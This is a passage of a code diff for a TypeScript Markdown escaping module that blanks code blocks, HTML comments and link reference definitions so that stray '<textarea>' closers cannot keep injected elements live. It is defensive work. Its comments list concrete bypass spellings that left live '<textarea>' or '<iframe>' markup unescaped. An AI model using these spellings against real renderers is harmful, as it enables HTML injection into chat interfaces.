+
*
|
|
1171
|
+
* This replaces the old `blankUnclosedFence` + `PROTECTED_SPAN_RE` fence
|
|
1172
|
+
* alternative and subsumes both:
|
|
1173
|
+
* - a CLOSED fence is blanked from its opener line through its closer line;
|
|
1174
|
+
* - an EOF-terminated fence is blanked from its opener line to the end of the
|
|
1175
|
+
* run (the case `blankUnclosedFence` covered);
|
|
1176
|
+
* - a would-be closer carrying an INFO STRING (```` ```html ````) no longer
|
|
1177
|
+
* ends the region, because the tracker applies CommonMark's rule that a
|
|
1178
|
+
* closer may not have one. `PROTECTED_SPAN_RE` did end the span there, so
|
|
1179
|
+
* ` ```js … ```html\n</textarea>\n``` ` left the `</textarea>` unmasked and
|
|
1180
|
+
* a prose opener above it stayed live.
|
|
1181
|
+
*/
|
|
1182
|
+
function blankFencedRegions(masked: string, lines: MaskLine[]): string {
|
|
1183
|
+
const fences = createFenceTracker()
|
|
1184
|
+
const ranges: Array<[number, number]> = []
|
|
1185
|
+
let openStart: number | null = null
|
|
1186
|
+
let lastEnd = 0
|
|
1187
|
+
for (const line of lines) {
|
|
1188
|
+
const role = fences.push(line.content)
|
|
1189
|
+
lastEnd = line.contentStart + line.content.length
|
|
1190
|
+
if (role === 'open') openStart = line.start
|
|
1191
|
+
else if (role === 'close' && openStart !== null) {
|
|
1192
|
+
ranges.push([openStart, lastEnd])
|
|
1193
|
+
openStart = null
|
|
1194
|
+
}
|
|
1195
|
+
}
|
|
1196
|
+
if (openStart !== null) ranges.push([openStart, lastEnd])
|
|
1197
|
+
return blankRanges(masked, ranges)
|
|
1198
|
+
}
|
|
1199
|
+
|
|
1200
|
+
/**
|
|
1201
|
+
* Blank INDENTED code blocks. A `</textarea>` written as an indented code
|
|
1202
|
+
* sample is code, not a closer — but `FENCE_RE` deliberately caps fence indent
|
|
1203
|
+
* at 3 spaces, so the tracker never sees these lines.
|
|
1204
|
+
*
|
|
1205
|
+
* The threshold is LIST-AWARE, not a flat 4 columns. CommonMark measures
|
|
1206
|
+
* indented code from the enclosing list item's CONTENT column, so under
|
|
1207
|
+
* `1. ` (content column 4) a 4-space line is a paragraph continuation, not
|
|
1208
|
+
* code — and `"1. Here is a form:\n\n <textarea>\n </textarea>\n"` had
|
|
1209
|
+
* its closer blanked, `hasLaterCloser` returned false, and a perfectly real
|
|
1210
|
+
* element got escaped. A numbered list containing markup is a very ordinary
|
|
1211
|
+
* chat answer, so "fail closed" is not a good enough excuse here.
|
|
1212
|
+
*
|
|
1213
|
+
* The walk mirrors `blankQuotedCode`'s line-state approach: a stack of open
|
|
1214
|
+
* list content columns, `code` meaning `indent >= top + 4`. Blank lines keep
|
|
1215
|
+
* the state (a list item survives them); a line indented below the top of the
|
|
1216
|
+
* stack pops it. A line indented past the code threshold is treated as code
|
|
1217
|
+
* BEFORE it is considered as a list marker.
|
|
1218
|
+
*
|
|
1219
|
+
* SCAN-SOURCE INVERSION (same reasoning as `blankComments`, and NOT the shared
|
|
1220
|
+
* contract): the caller must pass lines re-derived from the CURRENT mask, not
|
|
1221
|
+
* from `folded`. Fence content is already blanked by `blankFencedRegions`, but
|
|
1222
|
+
* that only holds for WRITING the mask — a walk over `folded` still SEES those
|
|
1223
|
+
* lines, so a `- x` written inside a fence pushed a content column of 2 and a
|
|
1224
|
+
* later top-level column-4 indented-code line then failed `indent >= top + 4`,
|
|
1225
|
+
* went unblanked, and its code-sample `</textarea>` kept a prose opener LIVE.
|
|
1226
|
+
* Over the masked copy those lines are all spaces, hit the `isBlankLine`
|
|
1227
|
+
* continue, preserve list state and push no bogus column.
|
|
1228
|
+
*
|
|
1229
|
+
* CONTENT-COLUMN CLAMP: CommonMark clamps an item's content column to
|
|
1230
|
+
* `markerEnd + 1` when the first block starts MORE than 4 spaces after the
|
|
1231
|
+
* marker — the remainder is indented code INSIDE the item. Taking the literal
|
|
1232
|
+
* column instead meant `-` + six spaces raised the threshold to 11, so a
|
|
1233
|
+
* column-7 `</textarea>` code sample was not blanked.
|
|
1234
|
+
*
|
|
1235
|
+
* KNOWN OMISSION (deliberate, fail-CLOSED): there is NO paragraph state. Under
|
|
1236
|
+
* CommonMark indented code cannot interrupt a paragraph, so a LAZY
|
|
1237
|
+
* continuation line — `'Here is a form: <textarea>\nsome paragraph\n </textarea>\n'`
|
|
1238
|
+
* — is paragraph text, yet this walk blanks it as code and the (real, properly
|
|
1239
|
+
* closed) element is escaped to visible source. That is cosmetic, and the
|
|
1240
|
+
* option NOT taken here is the fail-OPEN direction: skipping the code test in
|
|
1241
|
+
* paragraph state means blanking LESS, i.e. more closers visible to
|
|
1242
|
+
* `hasLaterCloser` and more openers left live. The list-awareness above was
|
|
1243
|
+
* worth its risk because it is unconditional over an entire list item; this
|
|
1244
|
+
* one is not, so it is documented rather than implemented.
|
|
1245
|
+
*/
|
|
1246
|
+
const LIST_MARKER_RE = /^([ \t]*)(?:[-*+]|\d{1,9}[.)])([ \t]+)(?=\S)/
|
|
1247
|
+
|
|
1248
|
+
/** Visual column of `upTo` chars of `line`, expanding tabs to 4-col stops. */
|
|
1249
|
+
function visualColumn(line: string, upTo: number): number {
|
|
1250
|
+
let col = 0
|
|
1251
|
+
for (let i = 0; i < upTo; i++) col = line[i] === '\t' ? col + 4 - (col % 4) : col + 1
|
|
1252
|
+
return col
|
|
1253
|
+
}
|
|
1254
|
+
|
|
1255
|
+
function leadingIndent(line: string): number {
|
|
1256
|
+
const ws = /^[ \t]*/.exec(line)![0]
|
|
1257
|
+
return visualColumn(line, ws.length)
|
|
1258
|
+
}
|
|
1259
|
+
|
|
1260
|
+
/** Character index at which `line` reaches visual column `col`, or -1 when the
|
|
1261
|
+
* column falls INSIDE a tab (no exact character boundary) or the line is too
|
|
1262
|
+
* short. The mask is length-preserving, so a container prefix can only ever be
|
|
1263
|
+
* cut at a character boundary; -1 makes the caller decline to strip, which
|
|
1264
|
+
* leaves the line looking indented and therefore blanks MORE (fail-CLOSED). */
|
|
1265
|
+
function charIndexAtColumn(line: string, col: number): number {
|
|
1266
|
+
let c = 0
|
|
1267
|
+
for (let i = 0; i < line.length; i++) {
|
|
1268
|
+
if (c === col) return i
|
|
1269
|
+
c = line[i] === '\t' ? c + 4 - (c % 4) : c + 1
|
|
1270
|
+
if (c > col) return -1
|
|
1271
|
+
}
|
|
1272
|
+
return c === col ? line.length : -1
|
|
1273
|
+
}
|
|
1274
|
+
|
|
1275
|
+
function blankIndentedCode(masked: string, lines: MaskLine[]): string {
|
|
1276
|
+
const listContentCols: number[] = []
|
|
1277
|
+
const ranges: Array<[number, number]> = []
|
|
1278
|
+
for (const line of lines) {
|
|
1279
|
+
// CommonMark's blank line (spaces/tabs, `\r`-tolerant), NOT `trim()` — see
|
|
1280
|
+
// `isBlankLine`. An NBSP-only line is CONTENT, and skipping it here as
|
|
1281
|
+
// "blank" is the same one-character reopening documented there.
|
|
1282
|
+
if (isBlankLine(line.content)) continue
|
|
1283
|
+
const indent = leadingIndent(line.content)
|
|
1284
|
+
const top = listContentCols.length ? listContentCols[listContentCols.length - 1] : 0
|
|
1285
|
+
if (indent >= top + 4) {
|
|
1286
|
+
ranges.push([line.contentStart, line.contentStart + line.content.length])
|
|
1287
|
+
continue
|
|
1288
|
+
}
|
|
1289
|
+
while (listContentCols.length && indent < listContentCols[listContentCols.length - 1])
|
|
1290
|
+
listContentCols.pop()
|
|
1291
|
+
const marker = LIST_MARKER_RE.exec(line.content)
|
|
1292
|
+
if (marker) {
|
|
1293
|
+
const markerEndCol = visualColumn(line.content, marker[0].length - marker[2].length)
|
|
1294
|
+
const contentCol = visualColumn(line.content, marker[0].length)
|
|
1295
|
+
listContentCols.push(contentCol - markerEndCol > 4 ? markerEndCol + 1 : contentCol)
|
|
1296
|
+
}
|
|
1297
|
+
}
|
|
1298
|
+
return blankRanges(masked, ranges)
|
|
1299
|
+
}
|
|
1300
|
+
|
|
1301
|
+
/** Re-derive scannable lines from the CURRENT mask, preserving each line's
|
|
1302
|
+
* original `start` / `contentStart` (every pass is length-preserving, so the
|
|
1303
|
+
* offsets transfer verbatim). See `blankIndentedCode`'s SCAN-SOURCE
|
|
1304
|
+
* INVERSION. */
|
|
1305
|
+
function remapToMask(masked: string, lines: MaskLine[]): MaskLine[] {
|
|
1306
|
+
return lines.map((line) => ({
|
|
1307
|
+
...line,
|
|
1308
|
+
content: masked.slice(line.contentStart, line.contentStart + line.content.length),
|
|
1309
|
+
}))
|
|
1310
|
+
}
|
|
1311
|
+
|
|
1312
|
+
/**
|
|
1313
|
+
* Blank HTML COMMENTS. `<!-- </textarea> -->` is not a closer — parse5 consumes
|
|
1314
|
+
* it as comment data — yet it satisfied the raw substring search. The
|
|
1315
|
+
* unterminated form is blanked to EOF, matching what the tokenizer does with a
|
|
1316
|
+
* comment that never ends (and, again, failing closed).
|
|
1317
|
+
*
|
|
1318
|
+
* SCAN-SOURCE EXCEPTION: this is the ONE pass fed the already-masked copy
|
|
1319
|
+
* rather than the unmasked one. The shared contract exists because
|
|
1320
|
+
* the inline-code pass chews backticks off an unclosed fence opener and would
|
|
1321
|
+
* blind a fence scan — but for comments the reasoning INVERTS: a `<!--` inside a code
|
|
1322
|
+
* region is not a comment start, and treating it as one blanked the document to
|
|
1323
|
+
* EOF. Both `` Use `<!--` to start a comment. `` and a truncated `<!-- todo`
|
|
1324
|
+
* inside a ```html fence disabled EVERY later RAWTEXT closer in the message.
|
|
1325
|
+
* Running last over the masked copy is safe: all prior passes are
|
|
1326
|
+
* length-preserving so offsets still transfer verbatim, a `<!--` inside
|
|
1327
|
+
* fenced / inline / indented / quoted code is spaces by now and matches
|
|
1328
|
+
* nothing, and a genuine prose comment is untouched by any of them.
|
|
1329
|
+
*/
|
|
1330
|
+
const HTML_COMMENT_RE = /<!--[\s\S]*?-->|<!--[\s\S]*$/g
|
|
1331
|
+
|
|
1332
|
+
function blankComments(masked: string, source: string): string {
|
|
1333
|
+
HTML_COMMENT_RE.lastIndex = 0
|
|
1334
|
+
const ranges: Array<[number, number]> = []
|
|
1335
|
+
let m: RegExpExecArray | null
|
|
1336
|
+
while ((m = HTML_COMMENT_RE.exec(source)) !== null) {
|
|
1337
|
+
ranges.push([m.index, m.index + m[0].length])
|
|
1338
|
+
if (m[0].length === 0) HTML_COMMENT_RE.lastIndex++
|
|
1339
|
+
}
|
|
1340
|
+
return blankRanges(masked, ranges)
|
|
1341
|
+
}
|
|
1342
|
+
|
|
1343
|
+
/**
|
|
1344
|
+
* Blank LINK REFERENCE DEFINITIONS (round 18 — SECURITY).
|
|
1345
|
+
*
|
|
1346
|
+
* `remark` consumes a definition ENTIRELY and emits no node for it, so a
|
|
1347
|
+
* `</textarea>` written in a definition's DESTINATION or TITLE is never a real
|
|
1348
|
+
* closer — but it survived into the closer haystack, `hasLaterCloser` returned
|
|
1349
|
+
* true and a prose `<textarea>` above stayed LIVE. Reproduced byte-identical for
|
|
1350
|
+
* both `[a]: /x "</textarea>"` and `[a]: </textarea>`.
|
|
1351
|
+
*
|
|
1352
|
+
* FAIL DIRECTION: blank the WHOLE line on a definition-SHAPED match, without
|
|
1353
|
+
* modelling "a definition may not interrupt a paragraph". Over-blanking here can
|
|
1354
|
+
* only hide closers, i.e. escape MORE openers — the fail-CLOSED direction — so
|
|
1355
|
+
* the loose shape is the correct bias.
|
|
1356
|
+
*
|
|
1357
|
+
* MULTI-LINE SPELLINGS (round 19). CommonMark lets the destination AND/OR the
|
|
1358
|
+
* title sit on lines FOLLOWING the label. The previous continuation state was a
|
|
1359
|
+
* single `expectTitle` boolean checked against a BARE QUOTED TITLE, so
|
|
1360
|
+
* `[a]:\n/x "</textarea>"` blanked the `[a]:` line and left the whole
|
|
1361
|
+
* `destination + title` line visible (reproduced live, `escapeUnknownHtmlTags`
|
|
1362
|
+
* byte-identical); so did `[a]:\n</textarea>`. remark consumes the entire
|
|
1363
|
+
* definition and emits no link node at all, so the closer is fake in every one
|
|
1364
|
+
* of these spellings. The state is now a three-valued
|
|
1365
|
+
* `'none' | 'needDest' | 'needTitle'`:
|
|
1366
|
+
*
|
|
1367
|
+
* - a definition line with NO destination → `needDest`
|
|
1368
|
+
* - a definition line with a destination but NO title → `needTitle`
|
|
1369
|
+
* - `needDest` accepts a `destination [title]` line, then falls to
|
|
1370
|
+
* `needTitle` (or `none` when that line carried the title)
|
|
1371
|
+
* - `needTitle` accepts a bare quoted/parenthesised title line
|
|
1372
|
+
*
|
|
1373
|
+
* `needDest`'s continuation shape is deliberately loose (any single
|
|
1374
|
+
* non-whitespace run), which can over-blank ONE line after a bare `[a]:` — the
|
|
1375
|
+
* fail-CLOSED direction, and `[a]:` alone is not a shape prose produces.
|
|
1376
|
+
*
|
|
1377
|
+
* FOOTNOTES ARE EXCLUDED (round 19). `\[[^\]\n]{0,999}\]:` also matched a GFM
|
|
1378
|
+
* footnote definition `[^a]: …`, whose content is BLOCK-parsed and therefore
|
|
1379
|
+
* may contain REAL html: `[^a]: <textarea>hi</textarea>` rendered as escaped
|
|
1380
|
+
* visible source while the byte-identical pair in prose rendered correctly.
|
|
1381
|
+
* Cosmetic (fail-closed) rather than a security defect, but wrong, so the label
|
|
1382
|
+
* now rejects a leading `^`.
|
|
1383
|
+
*
|
|
1384
|
+
* CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankComments` — the shape absorbs
|
|
1385
|
+
* an optional blockquote run and one list marker, so a definition written inside
|
|
1386
|
+
* a quote or ON a list-marker line is covered by the SINGLE top-level call and
|
|
1387
|
+
* the pass never has to be threaded through the container recursion at a
|
|
1388
|
+
* container-relative column. The marker-line sweep dimension added in this round
|
|
1389
|
+
* found exactly that shape (`- [a]: /x "</textarea>"`) live.
|
|
1390
|
+
*/
|
|
1391
|
+
/**
|
|
1392
|
+
* The two `{0,16}` / `{1,16}` whitespace bounds here are the ONE cap in this
|
|
1393
|
+
* pass that may still decline a line, and it is unreachable as a fail-open: an
|
|
1394
|
+
* indent or a marker gap above 16 columns is also ≥ 4 columns past the
|
|
1395
|
+
* enclosing content column, so the line is INDENTED CODE and
|
|
1396
|
+
* `blankIndentedCode` has already blanked it. Verified live at gap 17
|
|
1397
|
+
* (`- ` + 16 spaces + `[a]: /x "</textarea>"` escapes correctly). Do not raise
|
|
1398
|
+
* them into an unbounded `*` on the assumption that "more is safer" — that
|
|
1399
|
+
* would let a 4-column-indented definition line escape the code path it
|
|
1400
|
+
* currently falls into.
|
|
1401
|
+
*/
|
|
1402
|
+
const LINK_DEF_CONTAINER_PREFIX = ' {0,3}(?:>[ \\t]?)*[ \\t]{0,16}(?:(?:[-*+]|\\d{1,9}[.)])[ \\t]{1,16})?'
|
|
1403
|
+
/**
|
|
1404
|
+
* NO REGEX, AND NO LENGTH BOUND, ON LABEL / DESTINATION / TITLE
|
|
1405
|
+
* (round 20 removed the `{0,999}` caps; round 21 removed the regexes).
|
|
1406
|
+
*
|
|
1407
|
+
* Round 20 removed the counted caps because a regex that fails to match leaves
|
|
1408
|
+
* the line VISIBLE — the fail-OPEN direction this module's contract forbids.
|
|
1409
|
+
* It left the SHAPE of those regexes untouched, and the shape was
|
|
1410
|
+
* BACKSLASH-BLIND: `[^"\n]*` / `[^'\n]*` / `[^)\n]*` / `[^>\n]*` / `[^\]\n]*`
|
|
1411
|
+
* each stop at the FIRST delimiter, escaped or not, while CommonMark lets a
|
|
1412
|
+
* title hold `\"` / `\'` / `\)` and a label hold `\]`. The class stopped early,
|
|
1413
|
+
* the full-line anchor `[ \t]*\r?$` then failed, and the line stayed VISIBLE
|
|
1414
|
+
* while remark still consumed the definition and emitted NOTHING — five live
|
|
1415
|
+
* spellings, each `escapeUnknownHtmlTags(md) === md` with one live
|
|
1416
|
+
* `<textarea>`:
|
|
1417
|
+
*
|
|
1418
|
+
* [a]: /x "a\"</textarea>" [a]: /x 'it\'s </textarea>'
|
|
1419
|
+
* [a]: /x (a\)</textarea>) [a\]b]: /x "</textarea>"
|
|
1420
|
+
* [a\]b]: </textarea>
|
|
1421
|
+
*
|
|
1422
|
+
* …while the unescaped CONTROL `[a]: /x "</textarea>"` blanked correctly, which
|
|
1423
|
+
* is what makes the escape (not the shape) the cause.
|
|
1424
|
+
*
|
|
1425
|
+
* AND THE LABEL AND TITLE MAY SPAN LINES. The old `'none' | 'needDest' |
|
|
1426
|
+
* 'needTitle'` state modelled continuation only AFTER the `]:`, so a LABEL that
|
|
1427
|
+
* opens on one line and closes on a later one, and a TITLE that opens
|
|
1428
|
+
* unterminated, were examined by NOBODY — `blankBracketLabels` deliberately
|
|
1429
|
+
* excludes a bare `[…]`, so the label had no other pass either. Live in both
|
|
1430
|
+
* renderers, byte-identical no-ops:
|
|
1431
|
+
*
|
|
1432
|
+
* [foo\n</textarea>]: /x [</textarea>\nfoo]: /x
|
|
1433
|
+
* [foo\n</textarea>\nbar]: /x > [foo\n> </textarea>]: /x
|
|
1434
|
+
* [a]: /x "line1\n</textarea>"
|
|
1435
|
+
*
|
|
1436
|
+
* …plus the escalation: a live `<iframe src=… width=… height=…>` behind
|
|
1437
|
+
* `[foo\n</iframe>]: /x`.
|
|
1438
|
+
*
|
|
1439
|
+
* THE PASS IS THEREFORE A CHARACTER PARSER, NOT A LINE REGEX. It is
|
|
1440
|
+
* ESCAPE-AWARE by construction (`skipEscaped` consumes `\` + one character
|
|
1441
|
+
* everywhere), has no length cap at all, and is LINEAR: every scan helper below
|
|
1442
|
+
* advances its cursor monotonically over one line, and the outer line loop
|
|
1443
|
+
* telescopes (see `findLabelClose`'s `stoppedAt` contract). No nested
|
|
1444
|
+
* quantifier survives, so the backtracking risk the counted caps used to
|
|
1445
|
+
* pretend to bound is gone rather than re-bounded. MEASURED, not assumed —
|
|
1446
|
+
* `__buildCloserHaystackForTest`, median of 7, at 37/151/389/989 KB, before →
|
|
1447
|
+
* after: list-dense 3.1/7.9/20.6/47.8 → 2.8/7.5/19.1/54.8 ms; realistic
|
|
1448
|
+
* 1.9/5.8/15.4/43.9 → 1.6/5.8/16.3/49.9 ms; definition-dense 1.3/5.5/15.0/40.0
|
|
1449
|
+
* → 1.4/5.9/17.8/45.2 ms. Every series stays DEAD LINEAR (2.5x input ⇒ ~2.7x
|
|
1450
|
+
* time) and the ~13-15% constant is the price of a character parser over a
|
|
1451
|
+
* regex. The ESCAPED-definition corpus is the outlier at 25.1 → 51.2 ms,
|
|
1452
|
+
* because HEAD did NO WORK on it: the backslash-blind regex failed to match and
|
|
1453
|
+
* left the line visible, which is precisely the defect. Adversarial shapes
|
|
1454
|
+
* (`[` + 40 backslash pairs per line, an all-unclosed-label document) are the
|
|
1455
|
+
* FASTEST corpora measured — 9.5 ms and 14.3 ms at 989 KB — because
|
|
1456
|
+
* `findLabelClose`'s `stoppedAt` contract makes the outer loop telescope
|
|
1457
|
+
* instead of rescanning the paragraph once per line. Do not remove `stoppedAt`;
|
|
1458
|
+
* a naive per-line lookahead is quadratic on exactly those inputs.
|
|
1459
|
+
*
|
|
1460
|
+
* EXIT DISCIPLINE — the structural point of this round. The parse has exactly
|
|
1461
|
+
* two stages, and the stage decides the fail direction:
|
|
1462
|
+
*
|
|
1463
|
+
* RECOGNITION (is this a definition at all?) may DECLINE. Every decline here
|
|
1464
|
+
* is a shape CommonMark also refuses, so remark emits the text as HTML and a
|
|
1465
|
+
* closer written in it is REAL — the same argument that keeps an inline
|
|
1466
|
+
* link's `[…]` and a bare shortcut reference visible. Declining is the
|
|
1467
|
+
* CORRECT answer, not a gap; the reachability argument for each is on the
|
|
1468
|
+
* exit itself.
|
|
1469
|
+
*
|
|
1470
|
+
* CONSUMPTION (a `[…]:` was recognized) may NEVER decline. Every give-up
|
|
1471
|
+
* routes through `blankLinesToParagraphBound` — the ONE give-up channel —
|
|
1472
|
+
* which blanks to the next blank line, CommonMark's own bound for a
|
|
1473
|
+
* definition, exactly as `blankInlineLinkPayloads` widens a capped payload to
|
|
1474
|
+
* `paragraphEnd`. A `decline` returned by the tail parser is a RECOGNITION
|
|
1475
|
+
* verdict delivered late (the line is not definition-shaped after all), and
|
|
1476
|
+
* it therefore unwinds the WHOLE construct — nothing is blanked — rather than
|
|
1477
|
+
* leaving a half-blanked span behind.
|
|
1478
|
+
*/
|
|
1479
|
+
|
|
1480
|
+
/** `\` consumes the next character. THE escape primitive for this pass — every
|
|
1481
|
+
* scan below advances through it, which is what makes them all backslash-aware
|
|
1482
|
+
* and all monotonic. */
|
|
1483
|
+
function skipEscaped(s: string, i: number): number {
|
|
1484
|
+
return s[i] === '\\' ? i + 2 : i + 1
|
|
1485
|
+
}
|
|
1486
|
+
|
|
1487
|
+
/** First UNESCAPED occurrence of `ch` in `s` at or after `at`, else -1. */
|
|
1488
|
+
function findUnescaped(s: string, at: number, ch: string): number {
|
|
1489
|
+
for (let i = at; i < s.length; i = skipEscaped(s, i)) if (s[i] === ch) return i
|
|
1490
|
+
return -1
|
|
1491
|
+
}
|
|
1492
|
+
|
|
1493
|
+
const isSpaceTab = (ch: string): boolean => ch === ' ' || ch === '\t'
|
|
1494
|
+
|
|
1495
|
+
function skipSpaces(s: string, i: number): number {
|
|
1496
|
+
while (i < s.length && isSpaceTab(s[i])) i++
|
|
1497
|
+
return i
|
|
1498
|
+
}
|
|
1499
|
+
|
|
1500
|
+
/** Lines are `\n`-split, so a CRLF document leaves a trailing `\r`. The pass
|
|
1501
|
+
* blanks WHOLE lines, so dropping it costs no offset accuracy. */
|
|
1502
|
+
const stripCr = (s: string): string => (s.endsWith('\r') ? s.slice(0, -1) : s)
|
|
1503
|
+
|
|
1504
|
+
const TITLE_CLOSE: Record<string, string> = { '"': '"', "'": "'", '(': ')' }
|
|
1505
|
+
|
|
1506
|
+
/** Index just past a title whose opening delimiter is at `i`, or -1 when the
|
|
1507
|
+
* title does not close on this line. CommonMark ALLOWS a title to span lines,
|
|
1508
|
+
* so -1 is a CONTINUATION signal, never a decline. */
|
|
1509
|
+
function parseTitleOnLine(s: string, i: number): number {
|
|
1510
|
+
const close = TITLE_CLOSE[s[i]]
|
|
1511
|
+
for (let q = i + 1; q < s.length; q = skipEscaped(s, q)) if (s[q] === close) return q + 1
|
|
1512
|
+
return -1
|
|
1513
|
+
}
|
|
1514
|
+
|
|
1515
|
+
/** Index just past a destination at `i`, or -1.
|
|
1516
|
+
*
|
|
1517
|
+
* RECOGNITION DECLINE (-1), reachability: only an angle destination that never
|
|
1518
|
+
* closes on its line. CommonMark forbids a line ending inside `<…>` and a bare
|
|
1519
|
+
* destination may not START with `<`, so such a line is not a definition to
|
|
1520
|
+
* remark either — it is emitted as paragraph text and any closer in it is
|
|
1521
|
+
* REAL. Blanking it would over-escape a genuine element. */
|
|
1522
|
+
function parseDestOnLine(s: string, i: number): number {
|
|
1523
|
+
if (s[i] === '<') {
|
|
1524
|
+
for (let q = i + 1; q < s.length; q = skipEscaped(s, q)) if (s[q] === '>') return q + 1
|
|
1525
|
+
return -1
|
|
1526
|
+
}
|
|
1527
|
+
let q = i
|
|
1528
|
+
while (q < s.length && !isSpaceTab(s[q])) q = skipEscaped(s, q)
|
|
1529
|
+
return q > i ? Math.min(q, s.length) : -1
|
|
1530
|
+
}
|
|
1531
|
+
|
|
1532
|
+
/** What the remainder of ONE line says about the definition being consumed. */
|
|
1533
|
+
type DefTail =
|
|
1534
|
+
| { k: 'done' } // destination (+ optional title) complete; line ends
|
|
1535
|
+
| { k: 'needDest' } // nothing on this line; the destination follows
|
|
1536
|
+
| { k: 'needTitle' } // destination taken; a title MAY follow on a later line
|
|
1537
|
+
| { k: 'openTitle'; close: string } // a title opened here and did not close
|
|
1538
|
+
| { k: 'decline' } // not definition-shaped after all (see below)
|
|
1539
|
+
|
|
1540
|
+
/**
|
|
1541
|
+
* RECOGNITION DECLINE, reachability, for every `decline` this returns:
|
|
1542
|
+
*
|
|
1543
|
+
* - trailing content after a COMPLETE destination (+ title): CommonMark reads
|
|
1544
|
+
* a definition only when nothing but whitespace follows, so `[a]: /x junk
|
|
1545
|
+
* </textarea>` is a PARAGRAPH to remark and its closer is REAL;
|
|
1546
|
+
* - a title that is not space-separated from the destination (`[a]: <x>"t"`) —
|
|
1547
|
+
* same, remark reads no title and the trailing text invalidates the line.
|
|
1548
|
+
* The ANGLE spelling is the reachable one (round 22): `parseDestOnLine`
|
|
1549
|
+
* consumes a BARE destination to the next space/tab, so in `[a]: /x"t"` the
|
|
1550
|
+
* quote is part of the destination and the line returns `needTitle`, never
|
|
1551
|
+
* this decline;
|
|
1552
|
+
* - a non-delimiter where a title must begin — same;
|
|
1553
|
+
* - an unclosed angle destination — see `parseDestOnLine`.
|
|
1554
|
+
*
|
|
1555
|
+
* In every case remark EMITS the text, so leaving it visible is required, not
|
|
1556
|
+
* merely permitted. This is the same boundary `blankBracketLabels` draws
|
|
1557
|
+
* around an inline link's `[…]`.
|
|
1558
|
+
*/
|
|
1559
|
+
function parseDefTail(c: string, at: number): DefTail {
|
|
1560
|
+
let q = skipSpaces(c, at)
|
|
1561
|
+
if (q >= c.length) return { k: 'needDest' }
|
|
1562
|
+
const destEnd = parseDestOnLine(c, q)
|
|
1563
|
+
if (destEnd < 0) return { k: 'decline' }
|
|
1564
|
+
q = destEnd
|
|
1565
|
+
const gap = skipSpaces(c, q)
|
|
1566
|
+
if (gap >= c.length) return { k: 'needTitle' }
|
|
1567
|
+
if (gap === q) return { k: 'decline' }
|
|
1568
|
+
return parseTitleTail(c, gap)
|
|
1569
|
+
}
|
|
1570
|
+
|
|
1571
|
+
/** The title half of `parseDefTail`, also used for a BARE title continuation
|
|
1572
|
+
* line. Same decline reachability. */
|
|
1573
|
+
function parseTitleTail(c: string, q: number): DefTail {
|
|
1574
|
+
const close = TITLE_CLOSE[c[q]]
|
|
1575
|
+
if (!close) return { k: 'decline' }
|
|
1576
|
+
const end = parseTitleOnLine(c, q)
|
|
1577
|
+
if (end < 0) return { k: 'openTitle', close }
|
|
1578
|
+
return skipSpaces(c, end) >= c.length ? { k: 'done' } : { k: 'decline' }
|
|
1579
|
+
}
|
|
1580
|
+
|
|
1581
|
+
/**
|
|
1582
|
+
* A definition's CONTINUATION lines carry the blockquote run and indent but
|
|
1583
|
+
* never a list marker — a marker would open a new item, not continue the
|
|
1584
|
+
* definition. The `{0,16}` indent bound is the same unreachable-as-fail-open
|
|
1585
|
+
* cap argued for `LINK_DEF_CONTAINER_PREFIX`: past 16 columns the line is ≥ 4
|
|
1586
|
+
* columns beyond the enclosing content column, i.e. INDENTED CODE that
|
|
1587
|
+
* `blankIndentedCode` has already blanked.
|
|
1588
|
+
*/
|
|
1589
|
+
const LINK_DEF_CONT_PREFIX_RE = / {0,3}(?:>[ \t]?)*[ \t]{0,16}/y
|
|
1590
|
+
/** `\[(?!\^)` — a GFM FOOTNOTE definition is NOT a link reference definition;
|
|
1591
|
+
* its content is block-parsed and may hold real HTML (round 19). */
|
|
1592
|
+
const LINK_DEF_OPEN_RE = new RegExp(`^${LINK_DEF_CONTAINER_PREFIX}\\[(?!\\^)`)
|
|
1593
|
+
|
|
1594
|
+
function contPrefixLen(c: string): number {
|
|
1595
|
+
LINK_DEF_CONT_PREFIX_RE.lastIndex = 0
|
|
1596
|
+
return LINK_DEF_CONT_PREFIX_RE.exec(c)![0].length
|
|
1597
|
+
}
|
|
1598
|
+
|
|
1599
|
+
/**
|
|
1600
|
+
* Walk forward for the `]:` that turns an opened label into a DEFINITION.
|
|
1601
|
+
* Crosses lines (a CommonMark label may), bounded by the next blank line.
|
|
1602
|
+
*
|
|
1603
|
+
* Returns `{ line, colon }` on success, or `{ stoppedAt }` — a RECOGNITION
|
|
1604
|
+
* decline whose reachability is:
|
|
1605
|
+
* - a `]` not followed by `:` → a bare shortcut reference or ordinary text,
|
|
1606
|
+
* which remark EMITS, so a closer inside it is real (the exclusion
|
|
1607
|
+
* `blankBracketLabels` already documents);
|
|
1608
|
+
* - an unescaped `[` inside the label → CommonMark rejects the label, so the
|
|
1609
|
+
* whole run is paragraph text;
|
|
1610
|
+
* - the paragraph bound with neither → an ordinary `[`-leading prose
|
|
1611
|
+
* paragraph, which must stay untouched.
|
|
1612
|
+
*
|
|
1613
|
+
* `stoppedAt` also makes the outer loop LINEAR. Nothing in `[i, stoppedAt)`
|
|
1614
|
+
* holds a `]` or `[`, so no line in that window can open a definition either;
|
|
1615
|
+
* the caller resumes at `max(stoppedAt, i + 1)` and the per-line work
|
|
1616
|
+
* telescopes instead of rescanning the paragraph once per line.
|
|
1617
|
+
*/
|
|
1618
|
+
function findLabelClose(
|
|
1619
|
+
lines: MaskLine[],
|
|
1620
|
+
i: number,
|
|
1621
|
+
from: number,
|
|
1622
|
+
): { line: number; colon: number } | { stoppedAt: number } {
|
|
1623
|
+
for (let j = i; j < lines.length; j++) {
|
|
1624
|
+
const c = stripCr(lines[j].content)
|
|
1625
|
+
if (j > i && isBlankLine(c)) return { stoppedAt: j }
|
|
1626
|
+
for (let q = j === i ? from : contPrefixLen(c); q < c.length; q = skipEscaped(c, q)) {
|
|
1627
|
+
if (c[q] === '[') return { stoppedAt: j }
|
|
1628
|
+
if (c[q] !== ']') continue
|
|
1629
|
+
return c[q + 1] === ':' ? { line: j, colon: q + 1 } : { stoppedAt: j }
|
|
1630
|
+
}
|
|
1631
|
+
}
|
|
1632
|
+
return { stoppedAt: lines.length }
|
|
1633
|
+
}
|
|
1634
|
+
|
|
1635
|
+
/**
|
|
1636
|
+
* Blank LINK REFERENCE DEFINITIONS (round 18 — SECURITY).
|
|
1637
|
+
*
|
|
1638
|
+
* `remark` consumes a definition ENTIRELY and emits no node for it, so a
|
|
1639
|
+
* `</textarea>` written in a definition's LABEL, DESTINATION or TITLE is never
|
|
1640
|
+
* a real closer — but it survived into the closer haystack, `hasLaterCloser`
